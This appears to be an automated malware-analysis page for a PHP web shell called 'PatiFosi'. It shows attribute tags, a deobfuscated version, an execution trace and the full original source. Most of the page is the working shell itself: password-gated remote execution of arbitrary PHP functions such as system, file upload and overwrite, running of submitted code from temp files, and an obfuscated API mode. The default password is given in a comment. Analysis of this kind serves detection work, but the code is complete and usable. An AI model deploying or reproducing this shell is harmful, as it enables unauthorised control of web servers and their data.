PHP Malware Analysis
patifosi.php
md5: ead1b83c6e889e5d79fbc9f3eeff3557
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Original)
- base64_encode (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
URLs
- https://i.ibb.co/nn0TWhS/patifosi.gif (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
error_reporting(0);
header("X-XSS-Protection: 0");
//config login
// localhost/patifosi.php?login=gans
$param = 'login';
// login input
$pw = 'e5e32f8c9a2e843080f5176871e8cd32';
// md5 password default = gans
$inDir = true;
// true or false, to enable input dir
$out = 'exit;';
// string, not login
$enc = true;
// js must enabled, editor & upload not encoded
$img = 'https://i.ibb.co/nn0TWhS/patifosi.gif';
// variable
$dirGet = $_GET['dir'];
$dirGET = $_GET['dir'];
$file = $_GET['file'];
$func = $_GET['func'];
$arg = $_GET['arg'];
$mode = $_GET['mode'];
$type = $_GET['type'];
$pass = $_GET[$param];
$md5 = md5("{$_GET[$param]}");
$host = $_SERVER['HTTP_HOST'];
$uplto = $_POST['uplto'];
$saveto = $_POST['saveto'];
$file = $_POST['file'];
$sec = $_GET['sec'];
$sc = $_SERVER['SCRIPT_NAME'];
// decode
function dec($str)
{
$str = base64_decode(strrev("{$str}"));
return str_replace('=', '-', "{$str}");
}
if (true && isset($dirGet)) {
$dirGet = dec($dirGet);
$func = dec($func);
$arg = dec($arg);
$uplto = dec($uplto);
$saveto = dec($saveto);
$file = dec($file);
}
// login
if ($md5 !== $pw) {
die("{$out}");
}
// tq
$w = array("pescyte", "idbte4m", "javcode", "zerobyte", "idxSmg", "patiUndetektet", "date" => "28 Mei 2018", "new date" => "16 Mei 2020");
// sorry for bad code //
// just for fun //
// checked type
if ($type) {
$typeChecked = "checked";
}
// checked iframe
if ($sec) {
$cekSec = "checked";
}
// chdir
if ($dirGet) {
chdir($dirGet);
}
// directory
$dirNow = getcwd();
// button encode
if ($enc) {
$encButton = 'enc()';
} else {
$encButton = '';
}
// upl dir
if ($uplto) {
$uplto = $uplto;
} else {
$uplto = $dirNow;
}
// save dir
if ($saveto) {
$saveto = $saveto;
} else {
$saveto = $dirNow;
}
// input dir
if ($inDir) {
$inputDir = "<th style='display:inline-block'>dir<br><input autocomplete='off' class='encode' type='text' name='dir' value='{$dirNow}' placeholder='/var/www/html'> </th>";
} else {
$Hidinput = "<input class='encode' type='hidden' name='dir' value='{$dirNow}'>";
}
// codemirror library in mode=edit
if ($mode == edit) {
$codemirror = "\n <script src='//codemirror.net/lib/codemirror.js'></script>\n <link rel='stylesheet' href='//codemirror.net/lib/codemirror.css'>\n <script src='//codemirror.net/mode/javascript/javascript.js'></script>\n <link rel='stylesheet' href='//codemirror.net/theme/monokai.css'>\n <script src='//codemirror.net/addon/edit/matchbrackets.js'></script>\n ";
}
// ?mode=api
if ($mode == api) {
$dirGet = dec($_GET['dir']);
$func = dec($_GET['func']);
$arg = dec($_GET['arg']);
chdir($dirGet);
if (function_exists($func)) {
@die($func($arg));
} else {
echo "failed";
}
exit;
}
$apiJs = "var dirNow = '{$dirNow}'; var func; var arg; var login = '{$host}{$sc}?{$param}={$pass}'; var api = login+'&mode=api'; var reqDir = api+'&dir='+rev(btoa(dirNow)).replace('=', '-');\n\n clear();\n\n function dir(){\n console.log(dirNow);\n };\n\n function cd(a){\n dirNow = a;\n var b = rev(btoa(a)).replace('=', '-');\n reqDir = api+'&dir='+b\n console.log(dirNow);\n };\n\n function go(a){\n var xmlhttp = new XMLHttpRequest();\n xmlhttp.timeout = 600000;\n xmlhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n console.log(this.responseText);\n }\n };\n\n xmlhttp.ontimeout = function (e) {\n console.log('time out');\n };\n\n xmlhttp.open('GET', a, true);\n xmlhttp.send();\n };" . '
function clear(){
console.clear();
console.log("%cPatiFosi", "background:#ff6b81; color:#2f3542; font-size:30px; font-family: Arial, Helvetica, sans-serif;");
console.log("dir()\\t\\t\\t\\t\\t\\/\\/ show dir now\\r\\ncd(\\"\\/www\\/html\\/tmp\\")\\t\\t\\/\\/ change dir\\r\\nrun(\\"system\\", \\"ls\\")\\t\\t\\/\\/ run command\\r\\nclear()");
}' . "\n\n function run(f, n){\n f = rev(btoa(f)).replace('=', '-');\n n = rev(btoa(n)).replace('=', '-');\n l = reqDir+'&func='+f+'&arg='+n;\n go('//'+l);\n };\n";
// ?mode=iframe
if ($mode == iframe) {
die("<title>PatiFosi</title><link rel='icon' href='{$img}' type='image/gif'><iframe src='?{$param}={$pass}&mode=command' style='position:fixed; top:0px; bottom:0px; right:0px; width: 100%; border: none; margin:0; padding:0; overflow: hidden; z-index:999999; height: 100%;'></iframe><script>function rev(str) {return str.split('').reverse().join('');}{$apiJs}</script>");
}
// run code
if ($_POST['run']) {
$code = $_POST['code'];
if ($_POST['tmp']) {
$tmp_file = dec($_POST['tmp']);
} else {
$tmp_file = tempnam(sys_get_temp_dir(), '');
}
if (file_put_contents("{$tmp_file}", "{$code}")) {
$tmp_run = "<mark style='background: #ffffff'><a href='?{$param}={$pass}&run={$tmp_file}' target='_blank' style='color:#2ed573'> run click here</a> -> {$tmp_file}";
} else {
$tmp_run = "<mark style='background: #ffffff'><a style='color:#ff4757'> failed saving tmp -> {$tmp_file}";
}
}
if ($_GET['run']) {
$runIn = $_GET['run'];
include "{$runIn}";
unlink($runIn);
exit;
}
echo "<html>\n<head>\n<title>PatiFosi</title>\n<link rel='icon' href='{$img}' type='image/gif'>\n<style>\n#clear { text-decoration: none; }\n.shadow {\n -moz-box-shadow: 4px 5px 7px rgba(0, 0, 0,0.5);\n -webkit-box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);\n box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);\n}\ninput { background-color: #ffffff; color: #2f3542; }\n</style>\n{$codemirror}\n<script>\nfunction rev(str) {\n return str.split('').reverse().join('');\n}\n\nfunction enc() {\n var x = document.getElementsByClassName('encode');\n var i;\n for (i = 0; i < x.length; i++) {\n x[i].value = rev(btoa(x[i].value)).replace('=', '-');\n }\n}\n\nfunction decFunc(){\n\tvar i;\n\tvar a = document.getElementById('funcList').options;\n\tvar b = document.getElementById('funcList');\n\tvar c = document.getElementById('func');\n\n\tfor (i = 0; i < a.length; i++) {\n\tb.options[i].value = atob(rev(b.options[i].value).replace('-', '='));\n\t}\n\tc.setAttribute('onfocus', '')\n}\n\nfunction isiArg(){\n\tvar a = document.getElementById('func').value;\n\tvar b = document.getElementById('arg');\n\tvar c = document.getElementById('funcList');\n\n\tif (a == c.options[0].value) {\n\t\tb.value = '123';\n\t} else if (a == c.options[1].value) {\n\t\tb.value = '/';\n\t} else if (a == c.options[5].value) {\n b.value = '.';\n } else if (a == c.options[2].value || a == c.options[3].value || a == c.options[4].value) {\n\t\tb.value = 'ls';\n\t} else if (a == c.options[6].value) {\n\t\tb.value = '*.html';\n\t} else if (a == c.options[7].value || a == c.options[8].value || a == c.options[9].value || a == c.options[10].value || a == c.options[11].value || a == c.options[13].value) {\n\t\tb.value = 'file.php';\n\t} else if (a == c.options[12].value) {\n\t\tb.value = 'new';\n\t}\n}\n\n{$apiJs}\n</script>\n</head>\n\n<body style='padding:5%; padding-top:2%; border: 3px solid #2f3542; font-family: Arial, Helvetica, sans-serif; background:#f1f2f6;'>\n <datalist id='funcList'>\n <option value='-=wbm5WawhGc'>\n <option value='-=QZjFGcz9FbhR3b091azlGZ'>\n <option value='tVGdzl3c'>\n <option value='-UncoR3czFGc'>\n <option value='-=wYlhXZfxGblh2c'>\n <option value='-=gcpRmbhN2c'>\n <option value='-=gYvx2Z'>\n <option value='MHduVGdu92YfRXZn9VZslmZ'>\n <option value='-UGbpZGZhVmc'>\n <option value='-UGbpZ2X0h2ZpxGanlGa'>\n <option value='-=QZslmZ'>\n <option value='r5Was5Wd'>\n <option value='-IXaktWb'>\n <option value='-g2Y19Gd'>\n </datalist>\n \n<center><h1 style='color:#2f3542'>PatiFosi</h1></center>\n<a style='font-size:10; color:#ff4757'>{$host}</a>\n<a style='font-size:10; color:#a4b0be'>@</a>\n<a style='font-size:10; color:#2f3542'>{$dirNow}</a>\n<a style='font-size:10; color:#ff4757' href='?{$param}={$pass}'>[Home]</a><center>\n<div style='background-color: #ff6b81'>\n<a id='clear' style='color:#2f3542' href='?{$param}={$pass}&mode=command&dir={$dirGET}'>[command] - </a>\n<a id='clear' style='color:#2f3542' href='?{$param}={$pass}&mode=edit&dir={$dirGET}'>[edit] - </a>\n<a id='clear' style='color:#2f3542' href='?{$param}={$pass}&mode=about&dir={$dirGET}'>[about] </a>\n</div>\n<br><br>\n";
// mode command
if ($mode == "command") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo " <form method='get' autocomplete='off'>\n <table id='clear' style='text-align:center'>\n <input type='hidden' name='{$param}' value='{$pass}'>\n <input type='hidden' name='mode' value='command'>\n {$Hidinput}\n <tr>\n <th style='display:inline-block'>iframe<br><input type='checkbox' name='sec' value='y' {$cekSec}> </th>\n {$inputDir}\n <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' class='encode' type='text' name='func' value='{$func}' placeholder='system'> </th>\n <th style='display:inline-block'>arg<br><input id='arg' class='encode' type='text' name='arg' value='{$arg2}' placeholder='ls'> </th> \n <td><br><input type='checkbox' name='type' value='checked' {$typeChecked} >array <input onclick='{$encButton}' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>\n </td>\n </tr>\n </table>\n </form>\n </center><br>\n <pre style='background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;'>";
if ($type == 'checked') {
echo "<i>var_dump({$func}({$arg}));</i><br>";
if (function_exists($func)) {
if ($sec == 'y') {
ob_start();
@var_dump($func($arg));
$run = ob_get_clean();
echo "</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>";
} else {
@var_dump($func($arg));
}
}
} else {
if (function_exists($func)) {
if ($sec == 'y') {
ob_start();
echo $func($arg);
$run = ob_get_clean();
echo "<i>echo({$func}({$arg}));</i><br>";
echo "</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>";
} else {
echo "<i>die({$func}({$arg}));</i><br>";
@die($func($arg));
}
}
}
// mode edit
} elseif ($mode == "edit") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo "\n \n <form method='get'>\n <table id='clear' style='text-align:center'>\n <input type='hidden' name='{$param}' value='{$pass}'>\n <input type='hidden' name='mode' value='edit'>\n {$Hidinput}\n <tr>\n {$inputDir}\n <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' autocomplete='off' class='encode' type='text' name='func' value='{$func}' placeholder='readfile'> </th>\n <th style='display:inline-block'>arg<br><input id='arg' autocomplete='off' class='encode' type='text' name='arg' value='{$arg2}' placeholder='file.php'> </th> \n <td><br><input type='checkbox' name='type' value='ob' {$typeChecked}>ob <input onclick='{$encButton}' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>\n </td>\n </tr>\n </table>\n </form></center>\n <div align='right'>\n <button class='shadow' type='button' onclick='fullN()' style='border-radius: 50%; border: none; background-color: #eccc68; color: #f1f2f6; text-align:right'>_</button>\n <button class='shadow' type='button' onclick='full()' style='border-radius: 50%; border: none; background-color: #2ed573; color: #f1f2f6; text-align:right'>_</button>\n <button class='shadow' type='button' onclick='reset()' style='border-radius: 50%; border: none; background-color: #ff4757; color: #f1f2f6; text-align:right'>_</button>\n <br></div>\n <form method='post' action='?{$param}={$pass}&mode=edit&dir={$dirGET}&type={$type}' enctype='multipart/form-data'>\n <div class='shadow'><textarea id='codemirror' name='code' style='width:100%; height: 50%;'>";
// codemirror
if (!empty($_GET['func']) && !empty($_GET['arg'])) {
if ($_GET['type'] !== 'ob') {
echo htmlspecialchars($func($arg));
} else {
ob_start();
htmlspecialchars($func($arg));
$run = ob_get_clean();
echo htmlspecialchars($run);
}
} elseif ($_POST['code']) {
echo htmlspecialchars($_POST['code']);
}
echo "</textarea></div><br><input type='hidden' name='tmp' class='encode' value='{$tmp_file}'><input onclick='{$encButton}' type='submit' name='run' value='run >>' style='background-color: #747d8c;color: #f1f2f6; float: right;'>\n\n <table style='width:100%'>\n <tr style='text-align:center'>\n <th style='display:inline-block; padding-right:10%; padding-left:10%;'>upload<br><input autocomplete='off' class='encode' type='text' name='uplto' value='{$uplto}' placeholder='{$dirNow}'><br><input type='file' name='datupload' style='border: 1px solid #dfe4ea; background:#f1f2f6;'><br><input onclick='{$encButton}' type='submit' name='uploadsubmit' value='upload' style='background-color: #57606f;color: #f1f2f6;'>\n </th>\n <th style='display:inline-block; padding-left:10%; padding-right:10%;'>save<br><input autocomplete='off' class='encode' type='text' name='saveto' value='{$saveto}' placeholder='{$dirNow}'><br><input autocomplete='off' class='encode' type='text' name='file' value='{$file}' placeholder='file.php'><br><input onclick='{$encButton}' type='submit' name='savesubmit' value='save' style='background-color: #57606f;color: #f1f2f6;'>\n </form></th>\n </tr>\n </table>\n <script>\n var myCodeMirror = CodeMirror.fromTextArea(document.getElementById('codemirror'), {\n theme: 'monokai',\n lineNumbers: true,\n matchBrackets: true,\n mode: 'javascript',\n viewportMargin: false,\n });\n\n function full(){\n myCodeMirror.setSize('100%', '100%');\n }\n\n function fullN(){\n myCodeMirror.setSize('100%', '60%');\n }\n\n function reset() {\n var txt;\n if (confirm('Ar u sure wanna reset d code?')) {\n myCodeMirror.setValue('');\n }\n }\n </script>\n ";
echo "<center><hr style='border-top: 1px solid #dfe4ea' width='90%'><h4>";
if (isset($_POST['savesubmit'])) {
if (!chdir($saveto)) {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> {$saveto}");
}
$fpc = 'file_put_contents';
$write = file_put_contents($file, $_POST['code']);
if ($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> saved -> {$file}");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed save -> {$file}");
}
} elseif (isset($_POST['uploadsubmit'])) {
if (!chdir($uplto)) {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> {$uplto}");
}
$uploadname = $_FILES['datupload']['name'];
$uploadtmp = $_FILES['datupload']['tmp_name'];
$write = copy($uploadtmp, $uploadname);
if ($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> uploaded -> {$uploadname}");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed upload -> {$uploadname}");
}
} elseif ($tmp_run) {
die("{$tmp_run}");
}
// mode about
} elseif ($mode == "about") {
echo "</center><pre style=\"background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;\"><i>var_dump(\$w);</i><br>";
echo var_dump($w);
} else {
echo "<img src='{$img}'><br>what ar u doin?<br>dont forget to open <b>console.log<b><br><br><a style='font-size:10; color:#ff4757' href='?{$param}={$pass}&mode=iframe'>[Go to iframe mode]</a>\n <noscript><i>javascript isn't running</i></noscript><script>\n if(!navigator.onLine) {\n alert('u must connect internet for best experience');\n }\n </script>";
}Execution traces
data/traces/ead1b83c6e889e5d79fbc9f3eeff3557_trace-1676249527.0487.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:52:32.946514]
1 0 1 0.000159 393528
1 3 0 0.000527 450648 {main} 1 /var/www/html/uploads/patifosi.php 0 0
2 4 0 0.000545 450648 error_reporting 0 /var/www/html/uploads/patifosi.php 2 1 0
2 4 1 0.000560 450688
2 4 R 22527
2 5 0 0.000574 450648 header 0 /var/www/html/uploads/patifosi.php 3 1 'X-XSS-Protection: 0'
2 5 1 0.000591 450744
2 5 R NULL
1 A /var/www/html/uploads/patifosi.php 6 $param = 'login'
1 A /var/www/html/uploads/patifosi.php 7 $pw = 'e5e32f8c9a2e843080f5176871e8cd32'
1 A /var/www/html/uploads/patifosi.php 8 $inDir = TRUE
1 A /var/www/html/uploads/patifosi.php 9 $out = 'exit;'
1 A /var/www/html/uploads/patifosi.php 10 $enc = TRUE
1 A /var/www/html/uploads/patifosi.php 11 $img = 'https://i.ibb.co/nn0TWhS/patifosi.gif'
1 A /var/www/html/uploads/patifosi.php 14 $dirGet = NULL
1 A /var/www/html/uploads/patifosi.php 15 $dirGET = NULL
1 A /var/www/html/uploads/patifosi.php 16 $file = NULL
1 A /var/www/html/uploads/patifosi.php 17 $func = NULL
1 A /var/www/html/uploads/patifosi.php 18 $arg = NULL
1 A /var/www/html/uploads/patifosi.php 19 $mode = NULL
1 A /var/www/html/uploads/patifosi.php 20 $type = NULL
1 A /var/www/html/uploads/patifosi.php 21 $pass = NULL
2 6 0 0.000757 450712 md5 0 /var/www/html/uploads/patifosi.php 22 1 ''
2 6 1 0.000771 450808
2 6 R 'd41d8cd98f00b204e9800998ecf8427e'
1 A /var/www/html/uploads/patifosi.php 22 $md5 = 'd41d8cd98f00b204e9800998ecf8427e'
1 A /var/www/html/uploads/patifosi.php 23 $host = 'localhost'
1 A /var/www/html/uploads/patifosi.php 24 $uplto = NULL
1 A /var/www/html/uploads/patifosi.php 25 $saveto = NULL
1 A /var/www/html/uploads/patifosi.php 26 $file = NULL
1 A /var/www/html/uploads/patifosi.php 27 $sec = NULL
1 A /var/www/html/uploads/patifosi.php 28 $sc = '/uploads/patifosi.php'
0.000904 371624
TRACE END [2023-02-12 22:52:32.947303]
Generated HTML code
<html><head></head><body>exit;</body></html>Original PHP code
<?php
error_reporting(0);
header("X-XSS-Protection: 0");
//config login
// localhost/patifosi.php?login=gans
$param = 'login'; // login input
$pw = 'e5e32f8c9a2e843080f5176871e8cd32'; // md5 password default = gans
$inDir = true; // true or false, to enable input dir
$out = 'exit;'; // string, not login
$enc = true; // js must enabled, editor & upload not encoded
$img = 'https://i.ibb.co/nn0TWhS/patifosi.gif';
// variable
$dirGet = $_GET['dir'];
$dirGET = $_GET['dir'];
$file = $_GET['file'];
$func = $_GET['func'];
$arg = $_GET['arg'];
$mode = $_GET['mode'];
$type = $_GET['type'];
$pass = $_GET[$param];
$md5 = md5("$_GET[$param]");
$host = $_SERVER['HTTP_HOST'];
$uplto = $_POST['uplto'];
$saveto = $_POST['saveto'];
$file = $_POST['file'];
$sec = $_GET['sec'];
$sc = $_SERVER['SCRIPT_NAME'];
// decode
function dec($str){
$str = base64_decode(strrev("$str"));
return str_replace('=', '-', "$str");
}
if($enc == true && isset($dirGet)){
$dirGet = dec($dirGet);
$func = dec($func);
$arg = dec($arg);
$uplto = dec($uplto);
$saveto = dec($saveto);
$file = dec($file);
};
// login
if($md5 !== $pw){
die("$out");
exit;
}
// tq
$w = array("pescyte", "idbte4m", "javcode", "zerobyte", "idxSmg", "patiUndetektet", "date"=>"28 Mei 2018", "new date"=>"16 Mei 2020");
// sorry for bad code //
// just for fun //
// checked type
if($type){
$typeChecked = "checked";
};
// checked iframe
if($sec){
$cekSec = "checked";
};
// chdir
if($dirGet){
chdir($dirGet);
};
// directory
$dirNow = getcwd();
// button encode
if($enc){
$encButton = 'enc()';
}else{
$encButton = '';
};
// upl dir
if($uplto){
$uplto = $uplto;
}else{
$uplto = $dirNow;
};
// save dir
if($saveto){
$saveto = $saveto;
}else{
$saveto = $dirNow;
};
// input dir
if($inDir){
$inputDir = "<th style='display:inline-block'>dir<br><input autocomplete='off' class='encode' type='text' name='dir' value='$dirNow' placeholder='/var/www/html'> </th>";
} else {
$Hidinput = "<input class='encode' type='hidden' name='dir' value='$dirNow'>";
};
// codemirror library in mode=edit
if($mode == edit){
$codemirror = "
<script src='//codemirror.net/lib/codemirror.js'></script>
<link rel='stylesheet' href='//codemirror.net/lib/codemirror.css'>
<script src='//codemirror.net/mode/javascript/javascript.js'></script>
<link rel='stylesheet' href='//codemirror.net/theme/monokai.css'>
<script src='//codemirror.net/addon/edit/matchbrackets.js'></script>
";
};
// ?mode=api
if($mode == api){
$dirGet = dec($_GET['dir']);
$func = dec($_GET['func']);
$arg = dec($_GET['arg']);
chdir($dirGet);
if (function_exists($func)) {
@die($func($arg));
}else{
echo 'failed';
}
exit;
}
$apiJs = "var dirNow = '$dirNow'; var func; var arg; var login = '$host$sc?$param=$pass'; var api = login+'&mode=api'; var reqDir = api+'&dir='+rev(btoa(dirNow)).replace('=', '-');
clear();
function dir(){
console.log(dirNow);
};
function cd(a){
dirNow = a;
var b = rev(btoa(a)).replace('=', '-');
reqDir = api+'&dir='+b
console.log(dirNow);
};
function go(a){
var xmlhttp = new XMLHttpRequest();
xmlhttp.timeout = 600000;
xmlhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
console.log(this.responseText);
}
};
xmlhttp.ontimeout = function (e) {
console.log('time out');
};
xmlhttp.open('GET', a, true);
xmlhttp.send();
};" . '
function clear(){
console.clear();
console.log("%cPatiFosi", "background:#ff6b81; color:#2f3542; font-size:30px; font-family: Arial, Helvetica, sans-serif;");
console.log("dir()\t\t\t\t\t\/\/ show dir now\r\ncd(\"\/www\/html\/tmp\")\t\t\/\/ change dir\r\nrun(\"system\", \"ls\")\t\t\/\/ run command\r\nclear()");
}' . "
function run(f, n){
f = rev(btoa(f)).replace('=', '-');
n = rev(btoa(n)).replace('=', '-');
l = reqDir+'&func='+f+'&arg='+n;
go('//'+l);
};
";
// ?mode=iframe
if($mode == iframe){
die("<title>PatiFosi</title><link rel='icon' href='$img' type='image/gif'><iframe src='?$param=$pass&mode=command' style='position:fixed; top:0px; bottom:0px; right:0px; width: 100%; border: none; margin:0; padding:0; overflow: hidden; z-index:999999; height: 100%;'></iframe><script>function rev(str) {return str.split('').reverse().join('');}$apiJs</script>");
exit;
}
// run code
if($_POST['run']){
$code = $_POST['code'];
if($_POST['tmp']){
$tmp_file = dec($_POST['tmp']);
}else{
$tmp_file = tempnam(sys_get_temp_dir(), '');
};
if(file_put_contents("$tmp_file","$code")){
$tmp_run = "<mark style='background: #ffffff'><a href='?$param=$pass&run=$tmp_file' target='_blank' style='color:#2ed573'> run click here</a> -> $tmp_file";
}else{
$tmp_run = "<mark style='background: #ffffff'><a style='color:#ff4757'> failed saving tmp -> $tmp_file";
};
};
if($_GET['run']){
$runIn = $_GET['run'];
include "$runIn";
unlink($runIn);
exit;
};
// header html
echo "<html>
<head>
<title>PatiFosi</title>
<link rel='icon' href='$img' type='image/gif'>
<style>
#clear { text-decoration: none; }
.shadow {
-moz-box-shadow: 4px 5px 7px rgba(0, 0, 0,0.5);
-webkit-box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);
box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);
}
input { background-color: #ffffff; color: #2f3542; }
</style>
$codemirror
<script>
function rev(str) {
return str.split('').reverse().join('');
}
function enc() {
var x = document.getElementsByClassName('encode');
var i;
for (i = 0; i < x.length; i++) {
x[i].value = rev(btoa(x[i].value)).replace('=', '-');
}
}
function decFunc(){
var i;
var a = document.getElementById('funcList').options;
var b = document.getElementById('funcList');
var c = document.getElementById('func');
for (i = 0; i < a.length; i++) {
b.options[i].value = atob(rev(b.options[i].value).replace('-', '='));
}
c.setAttribute('onfocus', '')
}
function isiArg(){
var a = document.getElementById('func').value;
var b = document.getElementById('arg');
var c = document.getElementById('funcList');
if (a == c.options[0].value) {
b.value = '123';
} else if (a == c.options[1].value) {
b.value = '/';
} else if (a == c.options[5].value) {
b.value = '.';
} else if (a == c.options[2].value || a == c.options[3].value || a == c.options[4].value) {
b.value = 'ls';
} else if (a == c.options[6].value) {
b.value = '*.html';
} else if (a == c.options[7].value || a == c.options[8].value || a == c.options[9].value || a == c.options[10].value || a == c.options[11].value || a == c.options[13].value) {
b.value = 'file.php';
} else if (a == c.options[12].value) {
b.value = 'new';
}
}
$apiJs
</script>
</head>
<body style='padding:5%; padding-top:2%; border: 3px solid #2f3542; font-family: Arial, Helvetica, sans-serif; background:#f1f2f6;'>
<datalist id='funcList'>
<option value='-=wbm5WawhGc'>
<option value='-=QZjFGcz9FbhR3b091azlGZ'>
<option value='tVGdzl3c'>
<option value='-UncoR3czFGc'>
<option value='-=wYlhXZfxGblh2c'>
<option value='-=gcpRmbhN2c'>
<option value='-=gYvx2Z'>
<option value='MHduVGdu92YfRXZn9VZslmZ'>
<option value='-UGbpZGZhVmc'>
<option value='-UGbpZ2X0h2ZpxGanlGa'>
<option value='-=QZslmZ'>
<option value='r5Was5Wd'>
<option value='-IXaktWb'>
<option value='-g2Y19Gd'>
</datalist>
<center><h1 style='color:#2f3542'>PatiFosi</h1></center>
<a style='font-size:10; color:#ff4757'>$host</a>
<a style='font-size:10; color:#a4b0be'>@</a>
<a style='font-size:10; color:#2f3542'>$dirNow</a>
<a style='font-size:10; color:#ff4757' href='?$param=$pass'>[Home]</a><center>
<div style='background-color: #ff6b81'>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=command&dir=$dirGET'>[command] - </a>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=edit&dir=$dirGET'>[edit] - </a>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=about&dir=$dirGET'>[about] </a>
</div>
<br><br>
";
// mode command
if ($mode == "command") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo " <form method='get' autocomplete='off'>
<table id='clear' style='text-align:center'>
<input type='hidden' name='$param' value='$pass'>
<input type='hidden' name='mode' value='command'>
$Hidinput
<tr>
<th style='display:inline-block'>iframe<br><input type='checkbox' name='sec' value='y' $cekSec> </th>
$inputDir
<th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' class='encode' type='text' name='func' value='$func' placeholder='system'> </th>
<th style='display:inline-block'>arg<br><input id='arg' class='encode' type='text' name='arg' value='$arg2' placeholder='ls'> </th>
<td><br><input type='checkbox' name='type' value='checked' $typeChecked >array <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>
</td>
</tr>
</table>
</form>
</center><br>
<pre style='background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;'>";
if($type == 'checked'){
echo "<i>var_dump($func($arg));</i><br>";
if (function_exists($func)) {
if($sec == 'y'){
ob_start();
@var_dump($func($arg));
$run = ob_get_clean();
echo("</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>");
} else {
@var_dump($func($arg));
}
}
} else {
if (function_exists($func)) {
if($sec == 'y'){
ob_start();
echo($func($arg));
$run = ob_get_clean();
echo "<i>echo($func($arg));</i><br>";
echo("</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>");
} else {
echo "<i>die($func($arg));</i><br>";
@die($func($arg));
}
}
}
// mode edit
} elseif ($mode == "edit") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo "
<form method='get'>
<table id='clear' style='text-align:center'>
<input type='hidden' name='$param' value='$pass'>
<input type='hidden' name='mode' value='edit'>
$Hidinput
<tr>
$inputDir
<th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' autocomplete='off' class='encode' type='text' name='func' value='$func' placeholder='readfile'> </th>
<th style='display:inline-block'>arg<br><input id='arg' autocomplete='off' class='encode' type='text' name='arg' value='$arg2' placeholder='file.php'> </th>
<td><br><input type='checkbox' name='type' value='ob' $typeChecked>ob <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>
</td>
</tr>
</table>
</form></center>
<div align='right'>
<button class='shadow' type='button' onclick='fullN()' style='border-radius: 50%; border: none; background-color: #eccc68; color: #f1f2f6; text-align:right'>_</button>
<button class='shadow' type='button' onclick='full()' style='border-radius: 50%; border: none; background-color: #2ed573; color: #f1f2f6; text-align:right'>_</button>
<button class='shadow' type='button' onclick='reset()' style='border-radius: 50%; border: none; background-color: #ff4757; color: #f1f2f6; text-align:right'>_</button>
<br></div>
<form method='post' action='?$param=$pass&mode=edit&dir=$dirGET&type=$type' enctype='multipart/form-data'>
<div class='shadow'><textarea id='codemirror' name='code' style='width:100%; height: 50%;'>";
// codemirror
if(!empty($_GET['func']) && !empty($_GET['arg'])){
if($_GET['type'] !== 'ob'){
echo(htmlspecialchars($func($arg)));
} else {
ob_start();
htmlspecialchars($func($arg));
$run = ob_get_clean();
echo(htmlspecialchars($run));
};
}elseif($_POST['code']){
echo(htmlspecialchars($_POST['code']));
};
echo "</textarea></div><br><input type='hidden' name='tmp' class='encode' value='$tmp_file'><input onclick='$encButton' type='submit' name='run' value='run >>' style='background-color: #747d8c;color: #f1f2f6; float: right;'>
<table style='width:100%'>
<tr style='text-align:center'>
<th style='display:inline-block; padding-right:10%; padding-left:10%;'>upload<br><input autocomplete='off' class='encode' type='text' name='uplto' value='$uplto' placeholder='$dirNow'><br><input type='file' name='datupload' style='border: 1px solid #dfe4ea; background:#f1f2f6;'><br><input onclick='$encButton' type='submit' name='uploadsubmit' value='upload' style='background-color: #57606f;color: #f1f2f6;'>
</th>
<th style='display:inline-block; padding-left:10%; padding-right:10%;'>save<br><input autocomplete='off' class='encode' type='text' name='saveto' value='$saveto' placeholder='$dirNow'><br><input autocomplete='off' class='encode' type='text' name='file' value='$file' placeholder='file.php'><br><input onclick='$encButton' type='submit' name='savesubmit' value='save' style='background-color: #57606f;color: #f1f2f6;'>
